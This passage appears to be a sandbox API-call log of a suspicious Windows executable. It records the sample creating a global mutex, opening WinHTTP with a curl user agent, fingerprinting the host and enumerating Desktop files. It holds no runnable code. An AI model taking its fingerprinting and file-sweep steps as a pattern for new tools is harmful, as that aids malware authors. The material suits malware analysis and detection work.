[4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.715] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.725] ConvertStringSecurityDescriptorToSecurityDescriptorW (in: StringSecurityDescriptor="D:(A;;GA;;;WD)(A;;GA;;;BA)(A;;GA;;;SY)(A;;GA;;;RC)", StringSDRevision=0x1, SecurityDescriptor=0xcea78, SecurityDescriptorSize=0x0 | out: SecurityDescriptor=0xcea78*=0x0*(Revision=0x1, Sbz1=0x0, Control=0x8004, Owner=0x0*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x14), Group=0x5c000200000014*(Revision=0x14, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x2, [3]=0x0, [4]=0x5c, [5]=0x0), SubAuthority=0x4), Sacl=0x14000000000004*(AclRevision=0x4, Sbz1=0x0, AclSize=0x0, AceCount=0x0, Sbz2=0x14), Dacl=0x10110000000*(AclRevision=0x0, Sbz1=0x0, AclSize=0x1000, AceCount=0x101, Sbz2=0x0)), SecurityDescriptorSize=0x0) returned 1 [0114.727] StringFromCLSID (in: rclsid=0xcea80*(Data1=0x9320442d, Data2=0x23a5, Data3=0xdb07, Data4=([0]=0xbd, [1]=0x98, [2]=0x99, [3]=0xe9, [4]=0x2c, [5]=0x62, [6]=0x9b, [7]=0xa1)), lplpsz=0xcea90 | out: lplpsz=0xcea90*="{9320442D-23A5-DB07-BD98-99E92C629BA1}") returned 0x0 [0114.727] CreateMutexW (lpMutexAttributes=0xcea98, bInitialOwner=1, lpName="Global\\{9320442D-23A5-DB07-BD98-99E92C629BA1}") returned 0x198 [0114.727] LocalFree (hMem=0x7071a0) returned 0x0 [0114.727] GetLastError () returned 0x0 [0114.728] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xce990 | out: pProxyConfig=0xce990) returned 1 [0115.267] WinHttpOpen (pszAgentW="curl/7.76.0", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x71b780 [0115.491] WinHttpSetTimeouts (hInternet=0x71b780, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1 [0115.500] GetVersionExW (in: lpVersionInformation=0xce740*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xce740*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0115.500] GetComputerNameW (in: lpBuffer=0x32e40850, nSize=0xce73c | out: lpBuffer="XC64ZB", nSize=0xce73c) returned 1 [0115.504] GetTickCount () returned 0xe86c3e [0115.505] Sleep (dwMilliseconds=0x1) [0115.519] GetTickCount () returned 0xe86c4e [0115.519] Sleep (dwMilliseconds=0x1) [0115.524] GetTickCount () returned 0xe86c5d [0115.524] Sleep (dwMilliseconds=0x1) [0115.539] GetTickCount () returned 0xe86c6d [0115.539] Sleep (dwMilliseconds=0x1) [0115.558] GetTickCount () returned 0xe86c7d [0115.558] Sleep (dwMilliseconds=0x1) [0115.563] GetTickCount () returned 0xe86c7d [0115.564] Sleep (dwMilliseconds=0x1) [0115.575] GetTickCount () returned 0xe86c8c [0115.575] Sleep (dwMilliseconds=0x1) [0115.579] GetTickCount () returned 0xe86c8c [0115.579] Sleep (dwMilliseconds=0x1) [0115.584] GetTickCount () returned 0xe86c8c [0115.584] Sleep (dwMilliseconds=0x1) [0115.586] GetTickCount () returned 0xe86c9c [0115.586] Sleep (dwMilliseconds=0x1) [0115.591] GetTickCount () returned 0xe86c9c [0115.591] Sleep (dwMilliseconds=0x1) [0115.594] GetTickCount () returned 0xe86c9c [0115.594] Sleep (dwMilliseconds=0x1) [0115.598] GetTickCount () returned 0xe86c9c [0115.598] Sleep (dwMilliseconds=0x1) [0115.601] GetTickCount () returned 0xe86c9c [0115.601] Sleep (dwMilliseconds=0x1) [0115.606] GetTickCount () returned 0xe86cab [0115.606] Sleep (dwMilliseconds=0x1) [0115.608] GetTickCount () returned 0xe86cab [0115.608] Sleep (dwMilliseconds=0x1) [0115.611] GetTickCount () returned 0xe86cab [0115.611] Sleep (dwMilliseconds=0x1) [0115.613] GetTickCount () returned 0xe86cab [0115.613] Sleep (dwMilliseconds=0x1) [0115.615] GetTickCount () returned 0xe86cab [0115.615] Sleep (dwMilliseconds=0x1) [0115.619] GetTickCount () returned 0xe86cbb [0115.619] Sleep (dwMilliseconds=0x1) [0115.620] GetTickCount () returned 0xe86cbb [0115.620] Sleep (dwMilliseconds=0x1) [0115.626] GetTickCount () returned 0xe86cbb [0115.626] GetTickCount () returned 0xe86cbb [0115.626] GetTickCount () returned 0xe86cbb [0115.626] GetTickCount () returned 0xe86cbb [0115.626] GetTickCount () returned 0xe86cbb [0115.626] Sleep (dwMilliseconds=0x1) [0115.629] GetTickCount () returned 0xe86cbb [0115.629] Sleep (dwMilliseconds=0x1) [0115.631] GetTickCount () returned 0xe86ccb [0115.632] Sleep (dwMilliseconds=0x1) [0115.634] GetTickCount () returned 0xe86ccb [0115.634] Sleep (dwMilliseconds=0x1) [0115.636] GetTickCount () returned 0xe86ccb [0115.636] Sleep (dwMilliseconds=0x1) [0115.643] GetTickCount () returned 0xe86ccb [0115.643] Sleep (dwMilliseconds=0x1) [0115.644] GetTickCount () returned 0xe86ccb [0115.644] Sleep (dwMilliseconds=0x1) [0115.646] GetTickCount () returned 0xe86ccb [0115.646] Sleep (dwMilliseconds=0x1) [0115.647] GetTickCount () returned 0xe86ccb [0115.647] Sleep (dwMilliseconds=0x1) [0115.649] GetTickCount () returned 0xe86cda [0115.649] Sleep (dwMilliseconds=0x1) [0115.650] GetTickCount () returned 0xe86cda [0115.650] Sleep (dwMilliseconds=0x1) [0115.651] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e40850, Size=0x70) returned 0x32e40850 [0115.652] GetAdaptersInfo (in: AdapterInfo=0x32e408d0, SizePointer=0xceb60 | out: AdapterInfo=0x32e408d0, SizePointer=0xceb60) returned 0x0 [0115.656] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x7204a0) returned 1 [0115.682] CryptCreateHash (in: hProv=0x7204a0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0115.684] CryptHashData (hHash=0x720b60, pbData=0x32e408dc, dwDataLen=0x194, dwFlags=0x0) returned 1 [0115.684] CryptGetHashParam (in: hHash=0x720b60, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0115.684] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e40580 [0115.684] CryptGetHashParam (in: hHash=0x720b60, dwParam=0x2, pbData=0x32e40580, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e40580, pdwDataLen=0xceadc) returned 1 [0115.684] CryptDestroyHash (hHash=0x720b60) returned 1 [0115.684] CryptReleaseContext (hProv=0x7204a0, dwFlags=0x0) returned 1 [0115.684] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32e405b0 [0115.688] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40580 | out: hHeap=0x2150000) returned 1 [0115.688] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e408d0 | out: hHeap=0x2150000) returned 1 [0117.836] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x50) returned 0x32e40650 [0117.836] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x4b0) returned 0x32e408d0 [0117.837] GetVersionExW (in: lpVersionInformation=0xce9a0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x29000029, dwBuildNumber=0x7ffb, dwPlatformId=0x700000, szCSDVersion="") | out: lpVersionInformation=0xce9a0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0117.837] GetNativeSystemInfo (in: lpSystemInfo=0xceac0 | out: lpSystemInfo=0xceac0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0117.837] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x100) returned 0x32b43d40 [0117.842] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e40580 [0117.842] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x40) returned 0x32e406b0 [0117.845] GetCurrentProcess () returned 0xffffffffffffffff [0117.845] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0xcec60 | out: TokenHandle=0xcec60*=0x20c) returned 1 [0117.845] GetTokenInformation (in: TokenHandle=0x20c, TokenInformationClass=0x1, TokenInformation=0xcec70, TokenInformationLength=0x54, ReturnLength=0xcec6c | out: TokenInformation=0xcec70, ReturnLength=0xcec6c) returned 1 [0117.845] AllocateAndInitializeSid (in: pIdentifierAuthority=0xcec58, nSubAuthorityCount=0x1, nSubAuthority0=0x12, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0xcec50 | out: pSid=0xcec50*=0x71ba70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1 [0117.846] EqualSid (pSid1=0xcec80*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), pSid2=0x71ba70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0 [0117.846] CloseHandle (hObject=0x20c) returned 1 [0117.847] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0xd0) returned 0x32b43e50 [0117.847] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0xd0) returned 0x32e40d90 [0117.847] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0xd0) returned 0x32e40e70 [0117.847] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x40) returned 0x32b43f30 [0117.847] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0xd0) returned 0x32e40f50 [0117.855] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*", lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xa789bca3, ftLastAccessTime.dwHighDateTime=0x1d7b3c9, ftLastWriteTime.dwLowDateTime=0xa789bca3, ftLastWriteTime.dwHighDateTime=0x1d7b3c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x716110 [0117.860] FindNextFileW (in: hFindFile=0x716110, lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xa789bca3, ftLastAccessTime.dwHighDateTime=0x1d7b3c9, ftLastWriteTime.dwLowDateTime=0xa789bca3, ftLastWriteTime.dwHighDateTime=0x1d7b3c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0117.860] FindNextFileW (in: hFindFile=0x716110, lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ee0e40, ftCreationTime.dwHighDateTime=0x1d7a4cd, ftLastAccessTime.dwLowDateTime=0x42f8dd80, ftLastAccessTime.dwHighDateTime=0x1d7a7a4, ftLastWriteTime.dwLowDateTime=0x42f8dd80, ftLastWriteTime.dwHighDateTime=0x1d7a7a4, nFileSizeHigh=0x0, nFileSizeLow=0x43a0, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName="-dhNOf.swf", cAlternateFileName="")) returned 1 [0117.860] FindNextFileW (in: hFindFile=0x716110, lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c1a2030, ftCreationTime.dwHighDateTime=0x1d7a442, ftLastAccessTime.dwLowDateTime=0x2d1642d0, ftLastAccessTime.dwHighDateTime=0x1d7b043, ftLastWriteTime.dwLowDateTime=0x2d1642d0, ftLastWriteTime.dwHighDateTime=0x1d7b043, nFileSizeHigh=0x0, nFileSizeLow=0xad9a, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName="-eP5dwWJdD rie.m4a", cAlternateFileName="-EP5DW~1.M4A")) returned 1 [0117.860] FindNextFileW (in: hFindFile=0x716110, lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7eacdda0, ftCreationTime.dwHighDateTime=0x1d7abfe, ftLastAccessTime.dwLowDateTime=0xd88e3390, ftLastAccessTime.dwHighDateTime=0x1d7af88, ftLastWriteTime.dwLowDateTime=0xd88e3390, ftLastWriteTime.dwHighDateTime=0x1d7af88, nFileSizeHigh=0x0, nFileSizeLow=0x12e40, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName="9JsFRh_WhTXN3Ij.mp3", cAlternateFileName="9JSFRH~1.MP3")) returned 1 [0117.860] FindNextFileW (in: hFindFile=0x716110, lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a407f00, ftCreationTime.dwHighDateTime=0x1d7b3c9, ftLastAccessTime.dwLowDateTime=0x8a407f00, ftLastAccessTime.dwHighDateTime=0x1d7b3c9, ftLastWriteTime.dwLowDateTime=0xc5868200, ftLastWriteTime.dwHighDateTime=0x1d7b3b8, nFileSizeHigh=0x0, nFileSizeLow=0x8103b, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName="c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe", cAlternateFileName="C3B123~1.EXE")) returned 1 [0117.861] FindNextFileW (in: hFindFile=0x716110, lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0117.864] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0117.864] SetFilePointer (in: hFile=0x21c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x11a [0117.865] SetFilePointer (in: hFile=0x21c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.865] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x120) returned 0x32e41030 [0117.865] ReadFile (in: hFile=0x21c, lpBuffer=0x32e41030, nNumberOfBytesToRead=0x11a, lpNumberOfBytesRead=0xcdd4c, lpOverlapped=0x0 | out: lpBuffer=0x32e41030*, lpNumberOfBytesRead=0xcdd4c*=0x11a, lpOverlapped=0x0) returned 1 [0117.865] CloseHandle (hObject=0x21c) returned 1 [0117.866] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41030 | out: hHeap=0x2150000) returned 1 [0117.866] FindNextFileW (in: hFindFile=0x716110, lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21efe310, ftCreationTime.dwHighDateTime=0x1d7a784, ftLastAccessTime.dwLowDateTime=0xbc846060, ftLastAccessTime.dwHighDateTime=0x1d7ab7e, ftLastWriteTime.dwLowDateTime=0xbc846060, ftLastWriteTime.dwHighDateTime=0x1d7ab7e, nFileSizeHigh=0x0, nFileSizeLow=0x5e42, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName="DXh-JrpA6-h3Kg.mkv", cAlternateFileName="DXH-JR~1.MKV")) returned 1 [0117.866] FindNextFileW (in: hFindFile=0x716110, lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab8970c0, ftCreationTime.dwHighDateTime=0x1d7ad27, ftLastAccessTime.dwLowDateTime=0x43f4fa50, ftLastAccessTime.dwHighDateTime=0x1d7af03, ftLastWriteTime.dwLowDateTime=0x43f4fa50, ftLastWriteTime.dwHighDateTime=0x1d7af03, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName="DxkQb1KQFTn", cAlternateFileName="DXKQB1~1")) returned 1 [0117.866] FindNextFileW (in: hFindFile=0x716110, lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd02c4890, ftCreationTime.dwHighDateTime=0x1d7a006, ftLastAccessTime.dwLowDateTime=0xa4b84570, ftLastAccessTime.dwHighDateTime=0x1d7ae9c, ftLastWriteTime.dwLowDateTime=0xa4b84570, ftLastWriteTime.dwHighDateTime=0x1d7ae9c, nFileSizeHigh=0x0, nFileSizeLow=0xf40c, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName="egODPmb0FmQVt.rtf", cAlternateFileName="EGODPM~1.RTF")) returned 1 [0117.866] FindNextFileW (in: hFindFile=0x716110, lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf078290, ftCreationTime.dwHighDateTime=0x1d7a2c2, ftLastAccessTime.dwLowDateTime=0xc6c91070, ftLastAccessTime.dwHighDateTime=0x1d7ab2e, ftLastWriteTime.dwLowDateTime=0xc6c91070, ftLastWriteTime.dwHighDateTime=0x1d7ab2e, nFileSizeHigh=0x0, nFileSizeLow=0x4ab5, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName="eWciLH40Lr.ots", cAlternateFileName="EWCILH~1.OTS")) returned 1 [0117.866] FindNextFileW (in: hFindFile=0x716110, lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf15e1f0, ftCreationTime.dwHighDateTime=0x1d7a137, ftLastAccessTime.dwLowDateTime=0xd30bb30, ftLastAccessTime.dwHighDateTime=0x1d7a369, ftLastWriteTime.dwLowDateTime=0xd30bb30, ftLastWriteTime.dwHighDateTime=0x1d7a369, nFileSizeHigh=0x0, nFileSizeLow=0xa1d7, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName="eYElF3YmX.flv", cAlternateFileName="EYELF3~1.FLV")) returned 1 [0117.866] FindNextFileW (in: hFindFile=0x716110, lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd396f90, ftCreationTime.dwHighDateTime=0x1d7a26a, ftLastAccessTime.dwLowDateTime=0xcff51b70, ftLastAccessTime.dwHighDateTime=0x1d7acc9, ftLastWriteTime.dwLowDateTime=0xcff51b70, ftLastWriteTime.dwHighDateTime=0x1d7acc9, nFileSizeHigh=0x0, nFileSizeLow=0x1448d, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName="fPOaYDzq.bmp", cAlternateFileName="")) returned 1 [0117.866] FindNextFileW (in: hFindFile=0x716110, lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4abcbe0, ftCreationTime.dwHighDateTime=0x1d7ac85, ftLastAccessTime.dwLowDateTime=0x7e369f60, ftLastAccessTime.dwHighDateTime=0x1d7ae73, ftLastWriteTime.dwLowDateTime=0x7e369f60, ftLastWriteTime.dwHighDateTime=0x1d7ae73, nFileSizeHigh=0x0, nFileSizeLow=0x14613, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName="FQWLX-G_uq1s0rXOV.bmp", cAlternateFileName="FQWLX-~1.BMP")) returned 1 [0117.866] FindNextFileW (in: hFindFile=0x716110, lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde52e900, ftCreationTime.dwHighDateTime=0x1d7adf4, ftLastAccessTime.dwLowDateTime=0x2436dfe0, ftLastAccessTime.dwHighDateTime=0x1d7af66, ftLastWriteTime.dwLowDateTime=0x2436dfe0, ftLastWriteTime.dwHighDateTime=0x1d7af66, nFileSizeHigh=0x0, nFileSizeLow=0x4c23, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName="gnkWd6S7dvI.gif", cAlternateFileName="GNKWD6~1.GIF")) returned 1 [0117.867] FindNextFileW (in: hFindFile=0x716110, lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1217920, ftCreationTime.dwHighDateTime=0x1d7a40d, ftLastAccessTime.dwLowDateTime=0xacc6e900, ftLastAccessTime.dwHighDateTime=0x1d7a925, ftLastWriteTime.dwLowDateTime=0xacc6e900, ftLastWriteTime.dwHighDateTime=0x1d7a925, nFileSizeHigh=0x0, nFileSizeLow=0x5666, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName="KFnyPoxPuCbvTUKeN.mkv", cAlternateFileName="KFNYPO~1.MKV")) returned 1 [0117.867] FindNextFileW (in: hFindFile=0x716110, lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1512f520, ftCreationTime.dwHighDateTime=0x1d7af99, ftLastAccessTime.dwLowDateTime=0x3a0c4d10, ftLastAccessTime.dwHighDateTime=0x1d7b03c, ftLastWriteTime.dwLowDateTime=0x3a0c4d10, ftLastWriteTime.dwHighDateTime=0x1d7b03c, nFileSizeHigh=0x0, nFileSizeLow=0x3d53, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName="lzMMkYUfOY18A.bmp", cAlternateFileName="LZMMKY~1.BMP")) returned 1 [0117.867] FindNextFileW (in: hFindFile=0x716110, lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73fe4910, ftCreationTime.dwHighDateTime=0x1d7adcb, ftLastAccessTime.dwLowDateTime=0xe8201de0, ftLastAccessTime.dwHighDateTime=0x1d7ae4e, ftLastWriteTime.dwLowDateTime=0xe8201de0, ftLastWriteTime.dwHighDateTime=0x1d7ae4e, nFileSizeHigh=0x0, nFileSizeLow=0x448b, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName="m4D3PHRwKAtBt_3Cw.csv", cAlternateFileName="M4D3PH~1.CSV")) returned 1 [0117.867] FindNextFileW (in: hFindFile=0x716110, lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x943304e0, ftCreationTime.dwHighDateTime=0x1d7a52a, ftLastAccessTime.dwLowDateTime=0x7b160510, ftLastAccessTime.dwHighDateTime=0x1d7b04d, ftLastWriteTime.dwLowDateTime=0x7b160510, ftLastWriteTime.dwHighDateTime=0x1d7b04d, nFileSizeHigh=0x0, nFileSizeLow=0xf86b, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName="nAuleMeWgghmYZ.m4a", cAlternateFileName="NAULEM~1.M4A")) returned 1 [0117.867] FindNextFileW (in: hFindFile=0x716110, lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0af4a10, ftCreationTime.dwHighDateTime=0x1d7a0c3, ftLastAccessTime.dwLowDateTime=0x50b42930, ftLastAccessTime.dwHighDateTime=0x1d7a2df, ftLastWriteTime.dwLowDateTime=0x50b42930, ftLastWriteTime.dwHighDateTime=0x1d7a2df, nFileSizeHigh=0x0, nFileSizeLow=0x7fcf, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName="oB6-qVnnuICQtXpuucp.mkv", cAlternateFileName="OB6-QV~1.MKV")) returned 1 [0117.867] FindNextFileW (in: hFindFile=0x716110, lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36d25690, ftCreationTime.dwHighDateTime=0x1d7adb1, ftLastAccessTime.dwLowDateTime=0x19be5660, ftLastAccessTime.dwHighDateTime=0x1d7af39, ftLastWriteTime.dwLowDateTime=0x19be5660, ftLastWriteTime.dwHighDateTime=0x1d7af39, nFileSizeHigh=0x0, nFileSizeLow=0x270b, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName="OkR4MbHNbwA1cgdQlD.avi", cAlternateFileName="OKR4MB~1.AVI")) returned 1 [0117.867] FindNextFileW (in: hFindFile=0x716110, lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25886b90, ftCreationTime.dwHighDateTime=0x1d7a762, ftLastAccessTime.dwLowDateTime=0x4625c140, ftLastAccessTime.dwHighDateTime=0x1d7a956, ftLastWriteTime.dwLowDateTime=0x4625c140, ftLastWriteTime.dwHighDateTime=0x1d7a956, nFileSizeHigh=0x0, nFileSizeLow=0x134e8, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName="pHAfK8IhYEY.mp3", cAlternateFileName="PHAFK8~1.MP3")) returned 1 [0117.867] FindNextFileW (in: hFindFile=0x716110, lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe7f6090, ftCreationTime.dwHighDateTime=0x1d7ad40, ftLastAccessTime.dwLowDateTime=0x72378be0, ftLastAccessTime.dwHighDateTime=0x1d7afc5, ftLastWriteTime.dwLowDateTime=0x72378be0, ftLastWriteTime.dwHighDateTime=0x1d7afc5, nFileSizeHigh=0x0, nFileSizeLow=0x118ef, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName="Skss-.mp4", cAlternateFileName="")) returned 1 [0117.867] FindNextFileW (in: hFindFile=0x716110, lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4188dba0, ftCreationTime.dwHighDateTime=0x1d7ab3a, ftLastAccessTime.dwLowDateTime=0xd974d6b0, ftLastAccessTime.dwHighDateTime=0x1d7b00f, ftLastWriteTime.dwLowDateTime=0xd974d6b0, ftLastWriteTime.dwHighDateTime=0x1d7b00f, nFileSizeHigh=0x0, nFileSizeLow=0xd8a0, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName="tN8kD.ots", cAlternateFileName="")) returned 1 [0117.867] FindNextFileW (in: hFindFile=0x716110, lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabd3d7b0, ftCreationTime.dwHighDateTime=0x1d7ad5d, ftLastAccessTime.dwLowDateTime=0x7da185d0, ftLastAccessTime.dwHighDateTime=0x1d7ad77, ftLastWriteTime.dwLowDateTime=0x7da185d0, ftLastWriteTime.dwHighDateTime=0x1d7ad77, nFileSizeHigh=0x0, nFileSizeLow=0x8c18, dwReserved0=0xe1bc, dwReserved1=0x0, cFileName="upwSNhx.bmp", cAlternateFileName="")) returned 1 [0117.867] FindNextFileW (in: hFindFile=0x716110, lpFindFileData=0xcdda0 | out: lpFindFileData=0xcdda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ad72e40, ftCreationTime.dwHighDateTime=0x1d7a3cc, 